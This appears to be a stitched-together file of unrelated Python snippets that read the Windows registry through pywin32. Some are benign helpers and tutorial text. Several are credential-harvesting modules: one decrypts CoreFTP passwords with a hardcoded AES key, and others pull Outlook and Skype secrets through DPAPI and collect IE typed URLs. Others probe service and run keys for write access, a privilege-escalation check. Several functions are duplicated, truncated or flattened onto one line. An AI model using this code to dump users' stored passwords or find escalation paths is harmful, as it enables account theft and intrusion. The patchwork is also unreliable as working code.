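def __init__(self):
    """Build ``self.map`` from the per-version ``Modules`` registry key.

    HKEY_CURRENT_USER is tried before HKEY_LOCAL_MACHINE and the first root
    whose key opens is the only one read.  Each subkey name is mapped to
    ``(default value, getDescr(default value))``.  Without pywin32 the map
    stays empty.

    NOTE(review): the default values are presumably module file paths, and
    the HKCU copy can be written by any process running as the user, so
    whatever imports through this map trusts user-writable data -- confirm
    that is acceptable for the deployment.
    """
    self.path = "WindowsRegistry"
    self.map = {}
    try:
        import win32api
    except ImportError:
        # pywin32 is optional; leave the map empty.
        return
    # Predefined root handles as signed 32-bit values (win32con is not
    # imported in this version).
    HKEY_CURRENT_USER = -2147483647
    HKEY_LOCAL_MACHINE = -2147483646
    # KEY_READ (0x20019).  The code only enumerates and queries; asking for
    # KEY_ALL_ACCESS makes the HKLM open fail for unprivileged users.
    KEY_READ = 0x20019
    subkey = r"Software\Python\PythonCore\%s\Modules" % sys.winver
    for root in (HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE):
        try:
            hkey = win32api.RegOpenKeyEx(root, subkey, 0, KEY_READ)
        except win32api.error:
            # Key absent or unreadable under this root; try the next one.
            continue
        try:
            numsubkeys = win32api.RegQueryInfoKey(hkey)[0]
            for i in range(numsubkeys):
                subkeyname = win32api.RegEnumKey(hkey, i)
                hskey = win32api.RegOpenKeyEx(hkey, subkeyname, 0, KEY_READ)
                try:
                    val = win32api.RegQueryValueEx(hskey, '')
                finally:
                    hskey.Close()
                desc = getDescr(val[0])
                self.map[subkeyname] = (val[0], desc)
        finally:
            # Release the handle even when enumeration fails part-way.
            hkey.Close()
        break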
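def __init__(self):
    """Build ``self.map`` from the per-version ``Modules`` registry key.

    HKEY_CURRENT_USER is tried before HKEY_LOCAL_MACHINE and the first root
    whose key opens is the only one read.  Each subkey name is mapped to
    ``(default value, getDescr(default value))``.  Without pywin32 the map
    stays empty.  Keys are opened with KEY_READ only.

    NOTE(review): the HKCU copy of this key is writable by the user, so the
    values read here should be treated as user-controlled input.
    """
    self.path = "WindowsRegistry"
    self.map = {}
    try:
        import win32api
        import win32con
    except ImportError:
        # pywin32 is optional; leave the map empty.
        return
    subkey = r"Software\Python\PythonCore\%s\Modules" % sys.winver
    for root in (win32con.HKEY_CURRENT_USER, win32con.HKEY_LOCAL_MACHINE):
        try:
            hkey = win32api.RegOpenKeyEx(root, subkey, 0, win32con.KEY_READ)
        except win32api.error:
            # Key absent or unreadable under this root; try the next one.
            continue
        try:
            numsubkeys = win32api.RegQueryInfoKey(hkey)[0]
            for i in range(numsubkeys):
                subkeyname = win32api.RegEnumKey(hkey, i)
                hskey = win32api.RegOpenKeyEx(hkey, subkeyname, 0,
                                              win32con.KEY_READ)
                try:
                    val = win32api.RegQueryValueEx(hskey, '')
                finally:
                    hskey.Close()
                desc = getDescr(val[0])
                self.map[subkeyname] = (val[0], desc)
        finally:
            # Release the handle even when enumeration fails part-way.
            hkey.Close()
        break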
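def _GetServiceShortName(longName):
    """Return the service key name whose DisplayName matches *longName*.

    The comparison is case-insensitive.  Returns None when no subkey of
    HKLM\\SYSTEM\\CurrentControlSet\\Services has a matching DisplayName.
    Keys are opened read-only, so no elevation is needed for the lookup.

    Thanks to Andy McKay for this code.
    """
    access = (win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS
              | win32con.KEY_QUERY_VALUE)
    hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,
                               "SYSTEM\\CurrentControlSet\\Services",
                               0, access)
    try:
        num = win32api.RegQueryInfoKey(hkey)[0]
        longName = longName.lower()
        for x in range(num):
            svc = win32api.RegEnumKey(hkey, x)
            skey = win32api.RegOpenKey(hkey, svc, 0, access)
            try:
                thisName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
            except win32api.error:
                # This service has no DisplayName value.
                continue
            finally:
                # One handle per service: close it before moving on.
                win32api.RegCloseKey(skey)
            if thisName.lower() == longName:
                return svc
        return None
    finally:
        win32api.RegCloseKey(hkey)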
class CoreFTP():
    # Reads the CoreFTP site profiles stored under
    # HKCU\Software\FTPware\CoreFTP\Sites and decrypts each 'PW' value.
    # The snippet is cut off inside get_key_info; nothing after the last
    # visible line is described here.
    def __init__(self):
        self

    def get_secret(self):
        # A single fixed key is used for every profile.  Because the key is a
        # constant, the stored 'PW' value is recoverable by anything that can
        # read this HKCU key; it is obfuscation rather than protection.
        return "hdfzpysvpzimorhk"

    def decrypt(self, hex):
        # 'hex' is the hex-encoded ciphertext read from the registry.
        encoded = binascii.unhexlify(hex)
        secret = self.get_secret()
        BLOCK_SIZE = 16  # assigned but not used in the visible code
        mode = AES.MODE_ECB  # ECB: no IV, equal plaintext blocks encrypt equally
        cipher = AES.new(secret, mode)
        # Everything from the first NUL byte onward is dropped.
        return cipher.decrypt(encoded).split('\x00')[0]

    def get_key_info(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        try:
            key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
        except Exception, e:
            # Key cannot be opened: report failure.
            return False
        # [0] of RegQueryInfoKey is the subkey count: one subkey per profile.
        num_profiles = win32api.RegQueryInfoKey(key)[0]
        pwdFound = []
        for n in range(num_profiles):
            name_skey = win32api.RegEnumKey(key, n)
            skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
            # [1] is the number of values in the profile subkey.
            num = win32api.RegQueryInfoKey(skey)[1]
            values = {}
            for nn in range(num):
                k = win32api.RegEnumValue(skey, nn)
                if k[0] == 'Host':
                    values['Host'] = k[1]
                if k[0] == 'Port':
                    values['Port'] = k[1]
                if k[0] == 'User':
                    values['User'] = k[1]
                    # The dict is appended when 'User' is seen; later keys
                    # still land in the same dict object.
                    pwdFound.append(values)
                if k[0] == 'PW':
                    try:
                        values['Password'] = self.decrypt(k[1])
                    except Exception, e:
                        # Decryption failed: store a placeholder instead.
                        values['Password'] = '******'
def list_values(hive, key=None, use_32bit_registry=False, include_default=True):
    '''
    Enumerates the values in a registry key or hive.

    :param str hive: The name of the hive. Can be one of the following

        - HKEY_LOCAL_MACHINE or HKLM
        - HKEY_CURRENT_USER or HKCU
        - HKEY_USER or HKU

    :param str key: The key (looks like a path) to the value name. If a key is
        not passed, the values under the hive will be returned.

    :param bool use_32bit_registry: Accesses the 32bit portion of the registry
        on 64 bit installations. On 32bit machines this is ignored.

    :param bool include_default: Toggle whether to include the '(Default)' value.

    :return: A list of values under the hive or key.
    :rtype: list

    CLI Example:

    .. code-block:: bash

        salt '*' reg.list_values HKLM 'SYSTEM\\CurrentControlSet\\Services\\Tcpip'
    '''
    # NOTE(review): include_default is accepted but never consulted in this
    # body; an unnamed value is always reported as "(Default)".
    local_hive = _to_unicode(hive)
    local_key = _to_unicode(key)

    registry = Registry()
    # NOTE(review): an unknown hive name raises a bare KeyError here.
    hkey = registry.hkeys[local_hive]
    # Access mask selected by the use_32bit_registry flag.
    access_mask = registry.registry_32[use_32bit_registry]
    handle = None
    values = list()

    try:
        handle = win32api.RegOpenKeyEx(hkey, local_key, 0, access_mask)

        # [1] of RegQueryInfoKey is the number of values under the key.
        for i in range(win32api.RegQueryInfoKey(handle)[1]):
            vname, vdata, vtype = win32api.RegEnumValue(handle, i)

            # The key's unnamed value has an empty name.
            if not vname:
                vname = "(Default)"

            value = {'hive': local_hive,
                     'key': local_key,
                     'vname': _to_mbcs(vname),
                     'vdata': _to_mbcs(vdata),
                     'vtype': registry.vtype_reverse[vtype],
                     'success': True}
            values.append(value)
    except pywintypes.error as exc:  # pylint: disable=E0602
        # Every pywintypes.error (access denied included) is reported as
        # "Cannot find key"; the return shape changes from a list to a
        # (False, message) tuple.
        log.debug(r'Cannot find key: %s\%s', hive, key, exc_info=True)
        return False, r'Cannot find key: {0}\{1}'.format(hive, key)
    finally:
        # Close the handle on both the success and the failure path.
        if handle:
            handle.Close()
    return values
def get_services_from_registry(self): service_keys = [] # Open the Base on read only accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE accessWrite = win32con.KEY_WRITE | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, 'SYSTEM\\CurrentControlSet\\Services', 0, accessRead) num = win32api.RegQueryInfoKey(hkey)[0] # loop through all subkeys for x in range(0, num): sk = Service() # Name of the service svc = win32api.RegEnumKey(hkey, x) sk.name = svc # ------ Check Write access of the key ------ try: sk.key = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%s" % svc skey = win32api.RegOpenKey(hkey, svc, 0, accessWrite) sk.is_key_writable = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%s" % svc except win32api.error: skey = win32api.RegOpenKey(hkey, svc, 0, accessRead) pass # ------ Check if the key has the Parameters\Application value presents ------ try: # find display name display_name = str( win32api.RegQueryValueEx(skey, 'DisplayName')[0]) if display_name: sk.display_name = display_name except win32api.error: # in case there is no key called DisplayName pass # ------ Check if the key has his executable with write access and the folder containing it as well ------ try: skey = win32api.RegOpenKey(hkey, svc, 0, accessRead) # find ImagePath name image_path = str( win32api.RegQueryValueEx(skey, 'ImagePath')[0]) if image_path: image_path = os.path.expandvars(image_path) if 'drivers' not in image_path.lower(): sk.full_path = image_path sk.paths = get_path_info(image_path) except win32api.error: pass service_keys.append(sk) return service_keys
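def getSoftwareList(self):
    """Report the DisplayName and DisplayVersion of each installed application.

    Walks every subkey of ``self.CONST_SW_SUBKEY`` under
    ``self.HKEY_LOCAL_MACHINE`` and hands each DisplayName / DisplayVersion
    value to ``self.preparefile``.  Any failure is reported through
    ``self.preparefile("Exception", ...)`` rather than raised.

    Keys are opened with KEY_READ: the walk never writes, and requesting
    KEY_ALL_ACCESS on HKLM would make it fail for non-administrators.
    """
    try:
        hHandle = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE,
                                        self.CONST_SW_SUBKEY, 0,
                                        win32con.KEY_READ)
        try:
            # [0] is the number of subkeys, one per application.
            hNoOfSubNodes = win32api.RegQueryInfoKey(hHandle)[0]
            for hCounter in range(hNoOfSubNodes):
                hAppName = win32api.RegEnumKey(hHandle, hCounter)
                hPath = self.CONST_SW_SUBKEY + "\\" + hAppName
                hOpenApp = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE,
                                                 hPath, 0, win32con.KEY_READ)
                try:
                    # [1] is the number of values in this subkey.
                    hMaxKeyCount = win32api.RegQueryInfoKey(hOpenApp)[1]
                    for hAttCounter in range(hMaxKeyCount):
                        hData = win32api.RegEnumValue(hOpenApp, hAttCounter)
                        if hData[0] == "DisplayName":
                            self.preparefile("SW Name", hData[1])
                        elif hData[0] == "DisplayVersion":
                            self.preparefile("SW Version", hData[1])
                finally:
                    # One handle per application: close it before the next.
                    win32api.RegCloseKey(hOpenApp)
        finally:
            win32api.RegCloseKey(hHandle)
    except Exception:
        # Best-effort inventory: record the failure and carry on.
        self.preparefile("Exception", "In exception in getSoftwareList")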
class Outlook(ModuleInfo):
    # Module that walks the current user's Outlook messaging profiles in the
    # registry and collects the accounts that carry a stored password value.
    def __init__(self):
        # Command-line option description handed to the ModuleInfo base.
        options = {'command': '-o', 'action': 'store_true', 'dest': 'outlook', 'help': 'outlook - IMAP, POP3, HTTP, SMTP, LDPAP (not Exchange)'}
        ModuleInfo.__init__(self, 'outlook', 'mails', options)

    def run(self, software_name=None):
        # Returns a list with one dict per account subkey that has a value
        # whose name contains 'password'; returns None if the profile key
        # cannot be opened.  software_name is not used in this body.
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'

        try:
            hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
        except Exception, e:
            print_debug('DEBUG', '{0}'.format(e))
            print_debug('WARNING', 'Outlook not installed.\nAn error occurs retrieving the registry key.\nKey = %s' % keyPath)
            return

        # [0] is the subkey count of the profile key.
        num = win32api.RegQueryInfoKey(hkey)[0]
        pwdFound = []
        for x in range(0, num):
            name = win32api.RegEnumKey(hkey, x)
            skey = win32api.RegOpenKey(hkey, name, 0, accessRead)

            num_skey = win32api.RegQueryInfoKey(skey)[0]
            if num_skey != 0:
                for y in range(0, num_skey):
                    name_skey = win32api.RegEnumKey(skey, y)
                    sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
                    # [1] is the value count of the account subkey.
                    num_sskey = win32api.RegQueryInfoKey(sskey)[1]
                    for z in range(0, num_sskey):
                        k = win32api.RegEnumValue(sskey, z)
                        if 'password' in k[0].lower():
                            # retrieve_info is defined outside this snippet.
                            # It runs once per matching value name, so an
                            # account with several such names is appended
                            # more than once.
                            values = self.retrieve_info(sskey, name_skey)
                            # keep the account only if something was read
                            if len(values) != 0:
                                pwdFound.append(values)
        # None of the handles opened above is closed explicitly.
        return pwdFound
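def _getLocation():
    '''
    Looks through the registry to find the current user's Cookies folder.
    This is the folder IE uses.

    Returns the data of the 'Cookies' value under the user's
    "Shell Folders" key, or None when no such value exists.
    '''
    # Raw string: the backslashes are path separators, not escapes.
    key = r'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders'
    # KEY_READ is enough for a lookup; KEY_ALL_ACCESS asked for rights the
    # function never uses.
    regkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, key, 0, win32con.KEY_READ)
    try:
        # [1] is the number of values under the key.
        num = win32api.RegQueryInfoKey(regkey)[1]
        for x in range(num):
            k = win32api.RegEnumValue(regkey, x)
            if k[0] == 'Cookies':
                return k[1]
        return None
    finally:
        win32api.RegCloseKey(regkey)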
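def store_certificates(path, hKey=win32con.HKEY_CURRENT_USER):
    """Return ``{subkey name: store_certficate_value(key, name)}`` for *path*.

    *hKey* is passed through hkey2handle() before the key is opened.  Every
    direct subkey of *path* is listed first and then resolved through
    store_certficate_value(), which is defined outside this snippet.
    """
    hKey = hkey2handle(hKey)
    k = win32api.RegOpenKey(hKey, path)
    try:
        # [0] is the number of subkeys under the store key.
        nsubkeys = win32api.RegQueryInfoKey(k)[0]
        subkeys = [win32api.RegEnumKey(k, i) for i in range(nsubkeys)]
        return dict((name, store_certficate_value(k, name))
                    for name in subkeys)
    finally:
        # Close the handle even if reading one certificate fails.
        win32api.RegCloseKey(k)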
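def list_keys(hive, key=None, use_32bit_registry=False):
    '''
    Enumerates the subkeys in a registry key or hive.

    :param str hive: The name of the hive. Can be one of the following

        - HKEY_LOCAL_MACHINE or HKLM
        - HKEY_CURRENT_USER or HKCU
        - HKEY_USERS or HKU
        - HKEY_CLASSES_ROOT or HKCR
        - HKEY_CURRENT_CONFIG or HKCC

    :param str key: The key (looks like a path) to the value name. If a key is
        not passed, the keys under the hive will be returned.

    :param bool use_32bit_registry: Accesses the 32bit portion of the registry
        on 64 bit installations. On 32bit machines this is ignored.

    :return: A list of keys/subkeys under the hive or key. On failure a
        ``(False, message)`` tuple is returned instead.
    :rtype: list

    CLI Example:

    .. code-block:: bash

        salt '*' reg.list_keys HKLM 'SOFTWARE'
    '''
    local_hive = _to_unicode(hive)
    local_key = _to_unicode(key)

    registry = Registry()
    try:
        hkey = registry.hkeys[local_hive]
    except KeyError:
        raise CommandExecutionError('Invalid Hive: {0}'.format(local_hive))
    # Access mask selected by the use_32bit_registry flag.
    access_mask = registry.registry_32[use_32bit_registry]

    subkeys = []
    handle = None
    try:
        handle = win32api.RegOpenKeyEx(hkey, local_key, 0, access_mask)

        # [0] of RegQueryInfoKey is the number of subkeys.
        for i in range(win32api.RegQueryInfoKey(handle)[0]):
            subkey = win32api.RegEnumKey(handle, i)
            if PY2:
                subkeys.append(_to_mbcs(subkey))
            else:
                subkeys.append(subkey)

    except Exception:  # pylint: disable=E0602
        # Any failure, access denied included, is reported as a missing key.
        log.debug(r'Cannot find key: %s\%s', hive, key, exc_info=True)
        return False, r'Cannot find key: {0}\{1}'.format(hive, key)
    finally:
        # Previously the handle was closed only on the success path and
        # leaked when enumeration failed part-way.
        if handle:
            handle.Close()

    return subkeys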
def get_values(self):
    """Return the names of the values under this key.

    The handle comes from ``self.get_keyh()``.  Any error at all yields an
    empty list, so callers cannot tell "no values" from "key unreadable".
    """
    names = []
    try:
        # RegQueryInfoKey -> (subkey count, value count, last-modified time)
        info = win32api.RegQueryInfoKey(self.get_keyh())
        (_subkeys, total, _mtime) = info
        index = 0
        while index < total:
            (name, _data, _kind) = win32api.RegEnumValue(self.get_keyh(), index)
            names.append(name)
            index += 1
    except:
        return []
    return names
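def _getLocation():
    """Examine the registry to find the cookie folder IE uses.

    Returns the data of the 'Cookies' value under the current user's
    "Shell Folders" key, or None when no such value exists.
    """
    key = r'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders'
    # KEY_READ is enough for a lookup; KEY_ALL_ACCESS asked for rights the
    # function never uses.
    regkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, key, 0, win32con.KEY_READ)
    try:
        # [1] is the number of values under the key.
        num = win32api.RegQueryInfoKey(regkey)[1]
        for x in range(num):
            k = win32api.RegEnumValue(regkey, x)
            if k[0] == 'Cookies':
                return k[1]
        return None
    finally:
        win32api.RegCloseKey(regkey)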
class Outlook():
    # Walks the current user's Outlook messaging profiles in the registry and
    # collects the accounts that carry a stored password value.
    def __init__(self):
        # The option dict is built and then discarded; nothing is stored on
        # the instance in this version.
        options = {'command': '-o', 'action': 'store_true', 'dest': 'outlook', 'help': 'outlook - IMAP, POP3, HTTP, SMTP, LDPAP (not Exchange)'}

    def run(self):
        # Returns a list with one dict per account subkey that has a value
        # whose name contains 'password'; returns None (silently) if the
        # profile key cannot be opened.
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'

        try:
            hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
        except Exception, e:
            return

        # [0] is the subkey count of the profile key.
        num = win32api.RegQueryInfoKey(hkey)[0]
        pwdFound = []
        for x in range(0, num):
            name = win32api.RegEnumKey(hkey, x)
            skey = win32api.RegOpenKey(hkey, name, 0, accessRead)

            num_skey = win32api.RegQueryInfoKey(skey)[0]
            if num_skey != 0:
                for y in range(0, num_skey):
                    name_skey = win32api.RegEnumKey(skey, y)
                    sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
                    # [1] is the value count of the account subkey.
                    num_sskey = win32api.RegQueryInfoKey(sskey)[1]
                    for z in range(0, num_sskey):
                        k = win32api.RegEnumValue(sskey, z)
                        if 'password' in k[0].lower():
                            # retrieve_info is not defined in this snippet.
                            values = self.retrieve_info(sskey, name_skey)
                            # keep the account only if something was read
                            if len(values) != 0:
                                pwdFound.append(values)

        # hand the collected accounts back to the caller
        return pwdFound
def _search_guts(results, hKey, path, parent=''):
    """Collect thumbprint-named subkeys below ``hKey\\path`` into *results*.

    A subkey accepted by _is_thumbprint() is appended as ``parent + name``;
    any other subkey is searched recursively with *parent* extended by
    ``path + '\\'``.  The opened key is always closed, even on error.
    """
    node = win32api.RegOpenKey(hKey, path)
    try:
        # [0] of RegQueryInfoKey is the number of subkeys.
        child_total = win32api.RegQueryInfoKey(node)[0]
        for index in range(child_total):
            child = win32api.RegEnumKey(node, index)
            if not _is_thumbprint(child):
                # Not a thumbprint: descend, relative to the handle just opened.
                _search_guts(results, node, child, parent=parent + path + '\\')
                continue
            results.append(parent + child)
    finally:
        win32api.RegCloseKey(node)
def retrieve_password(self):
    # Walks the current user's Outlook messaging profiles, collects the
    # accounts that carry a stored password value and passes the list to
    # print_output().  Returns None in every case.
    # print title
    Header().title_debug('Outlook')

    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'

    try:
        hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
    except:
        # The bare except reports every failure as "not installed".
        print_debug('ERROR', 'Outlook not installed.\nAn error occurs retrieving the registry key.\nKey = %s' % keyPath)
        return

    # [0] is the subkey count of the profile key.
    num = win32api.RegQueryInfoKey(hkey)[0]
    pwdFound = []
    for x in range(0, num):
        name = win32api.RegEnumKey(hkey, x)
        skey = win32api.RegOpenKey(hkey, name, 0, accessRead)

        num_skey = win32api.RegQueryInfoKey(skey)[0]
        if num_skey != 0:
            for y in range(0, num_skey):
                name_skey = win32api.RegEnumKey(skey, y)
                sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
                # [1] is the value count of the account subkey.
                num_sskey = win32api.RegQueryInfoKey(sskey)[1]
                for z in range(0, num_sskey):
                    k = win32api.RegEnumValue(sskey, z)
                    if 'password' in k[0].lower():
                        # retrieve_info is not defined in this snippet.
                        values = self.retrieve_info(sskey, name_skey)
                        # keep the account only if something was read
                        if len(values) != 0:
                            pwdFound.append(values)

    # print the results
    print_output("Outlook", pwdFound)
def enum_values(self):
    """Return a ValueCache mapping each value name to the MD5 of its data.

    Values are read from ``self.key_handle``.

    NOTE(review): the digest looks like a change fingerprint.  MD5 is not
    collision-resistant, so if the cache backs tamper detection a stronger
    hash would be the safer choice -- confirm the intended use.  Data that
    hashlib cannot take directly (non-bytes) will raise here.
    """
    # RegQueryInfoKey -> (subkey count, value count, last-modified time)
    _subkeys, total, _mtime = win32api.RegQueryInfoKey(self.key_handle)

    digests = {}
    index = 0
    while index < total:
        name, data, _kind = win32api.RegEnumValue(self.key_handle, index)
        digests[name] = hashlib.md5(data).hexdigest()
        index += 1

    return ValueCache(digests)
def retrieve_info(self, hkey, name_key):
    # Reads every value under hkey into a dict keyed by value name.
    # name_key is not used in the visible body, and no return statement is
    # visible either; the snippet may be cut off.
    values = {}
    # [1] is the number of values under the key.
    num = win32api.RegQueryInfoKey(hkey)[1]
    for x in range(0, num):
        k = win32api.RegEnumValue(hkey, x)
        if 'password' in k[0].lower():
            try:
                # The first byte of the stored data is skipped and the rest
                # is handed to DPAPI.  CryptUnprotectData is called with no
                # extra entropy, so the call succeeds for whatever code runs
                # in the context that protected the blob.
                password = win32crypt.CryptUnprotectData(k[1][1:], None, None, None, 0)[1]
                values[k[0]] = password.decode('utf16')
            except Exception, e:
                # Unprotect or decode failed: store a placeholder.
                values[k[0]] = 'N/A'
        else:
            try:
                values[k[0]] = str(k[1]).decode('utf16')
            except:
                # Not UTF-16 text: keep the plain string form.
                values[k[0]] = str(k[1])
def get_sensitive_registry_key(self):
    """Return one Registry_key record per value under the configured HKLM keys.

    The key paths come from self.definePath().  Each record carries the key
    path, the value name, the value data, get_path_info() of that data and,
    when the key opened with KEY_WRITE, the writable key path.

    A key in this list that opens for write lets the caller change what the
    values point at; the fix for such a finding is to correct the key's ACL.
    """
    keys = []
    runkeys_hklm = self.definePath()

    # access either in read only mode, or in write mode
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    accessWrite = win32con.KEY_WRITE | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE

    # Loop through all keys to check
    for keyPath in runkeys_hklm:
        is_key_writable = False

        # check if the registry key has writable access
        try:
            # The open itself is the probe: it succeeds only if the ACL
            # grants the caller write access.
            hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, keyPath, 0, accessWrite)
            is_key_writable = keyPath
        except:
            try:
                hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, keyPath, 0, accessRead)
            except:
                # Key absent or unreadable: skip it.
                continue

        # retrieve all values of the registry key
        try:
            # [1] is the number of values under the key
            num = win32api.RegQueryInfoKey(hkey)[1]

            # loop through the values in the key
            for x in range(0, num):
                k = win32api.RegEnumValue(hkey, x)

                stk = Registry_key()
                if is_key_writable:
                    stk.is_key_writable = is_key_writable

                stk.key = keyPath
                stk.name = k[0]
                stk.full_path = k[1]
                stk.paths = get_path_info(k[1])

                keys.append(stk)
            # Closed only on the success path; an error above skips it.
            win32api.RegCloseKey(hkey)
        except win32api.error:
            pass

    return keys
def get_regkey(self):
    # Reads the first value under HKCU\Software\Skype\ProtectedStorage and
    # returns its DPAPI-unprotected data; returns '' if the key cannot be
    # opened.  The snippet is cut off: the handler of the outer try is not
    # visible.
    try:
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        keyPath = 'Software\\Skype\\ProtectedStorage'

        try:
            hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
        except Exception, e:
            print e
            return ''

        # The value count is read but not used in the visible code.
        num = win32api.RegQueryInfoKey(hkey)[1]
        # Only the value at index 0 is read.
        k = win32api.RegEnumValue(hkey, 0)

        if k:
            key = k[1]
            # No extra entropy is passed, so DPAPI releases the data to
            # whatever code runs in the context that protected it.
            return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
def history_from_regedit(self): urls = [] # open the registry accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE keyPath = 'Software\\Microsoft\\Internet Explorer\\TypedURLs' try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) except: return [] num = win32api.RegQueryInfoKey(hkey)[1] for x in range(0, num): k = win32api.RegEnumValue(hkey, x) if k: urls.append(k[1]) return urls
def retrieve_softwares(self): results = [] # Open the Base on read only accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE # check the uninstall key path hkey = win32api.RegOpenKey( win32con.HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\\", 0, accessRead) num = win32api.RegQueryInfoKey(hkey)[0] # loop through number of subkeys for x in range(0, num): # Name of the software key sk = win32api.RegEnumKey(hkey, x) # ------ Check if the key has his executable with write access and the folder containing it as well ------ try: skey = win32api.RegOpenKey(hkey, sk, 0, accessRead) name = str(win32api.RegQueryValueEx(skey, "DisplayName")[0]) if name: # regex to not match security patch (KB) m = re.match(r".*KB[0-9]{5,7}.*", name, re.IGNORECASE) if not m: soft = Software() soft.name = name soft.version = str( win32api.RegQueryValueEx(skey, "DisplayVersion")[0]) soft.key = skey results.append(soft) except: pass return results
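def GetShortName(longName):
    """Return the service key name whose DisplayName equals *longName*.

    Returns None when no service matches.  The earlier form returned the
    last enumerated service name when nothing matched, which handed callers
    an unrelated service.

    Keys are opened with KEY_READ: the lookup never writes, and requesting
    KEY_ALL_ACCESS made it fail for callers without administrative rights.
    """
    import win32con
    hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,
                               "SYSTEM\\CurrentControlSet\\Services",
                               0, win32con.KEY_READ)
    try:
        # [0] is the number of subkeys, one per service.
        num = win32api.RegQueryInfoKey(hkey)[0]
        for x in range(num):
            svc = win32api.RegEnumKey(hkey, x)
            skey = win32api.RegOpenKey(hkey, svc, 0, win32con.KEY_READ)
            try:
                shortName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
            except win32api.error:
                # This service has no DisplayName value.
                continue
            finally:
                win32api.RegCloseKey(skey)
            if shortName == longName:
                return svc
        return None
    finally:
        win32api.RegCloseKey(hkey)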
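def GetShortName(longName):
    """Look up a service's key name from its display name.

    Returns the name of the subkey of HKLM\\SYSTEM\\CurrentControlSet\\Services
    whose DisplayName equals *longName*, or None when there is none.

    Keys are opened with KEY_READ: the lookup never writes, and requesting
    KEY_ALL_ACCESS made it fail for callers without administrative rights.
    """
    hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,
                               "SYSTEM\\CurrentControlSet\\Services",
                               0, win32con.KEY_READ)
    try:
        # [0] is the number of subkeys, one per service.
        num = win32api.RegQueryInfoKey(hkey)[0]
        # loop through the subkeys
        for x in range(num):
            # find service name, open subkey
            svc = win32api.RegEnumKey(hkey, x)
            skey = win32api.RegOpenKey(hkey, svc, 0, win32con.KEY_READ)
            try:
                # find display name
                shortName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
            except win32api.error:
                # in case there is no value called DisplayName
                continue
            finally:
                win32api.RegCloseKey(skey)
            if shortName == longName:
                return svc
        return None
    finally:
        win32api.RegCloseKey(hkey)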
win32api.RegQueryInfoKey(key) # RegQueryInfoKey函数查询项的基本信息; 返回项的子项数目、项值数目,以及最后一次修改时间
如:
import win32api
import win32con
# 打开“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer”项
key = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,'SOFTWARE\\Microsoft\\Internet Explorer',0, win32con.KEY_ALL_ACCESS)
# 注意:本例只做读取,以 win32con.KEY_READ 打开即可;KEY_ALL_ACCESS 只在需要写入时才用得到,而且对 HKEY_LOCAL_MACHINE 下的项通常需要管理员权限,否则打开会失败。
# 读取项的默认值''
# 输出为空,表示其默认值未设置
print win32api.RegQueryValue(key,'')
#读取项值名称为Version的项值数据,也就是Internet Explorer的版本
print win32api.RegQueryValueEx(key,'Version') # 显示如:('6.0.2900.2180', 1)
print win32api.RegQueryInfoKey(key) # 查询项的基本信息,显示如:(26, 7, 128178812229687500L)

6. 设置项值
win32api.RegSetValue(key,subKey,type,value) # 设置项的默认值
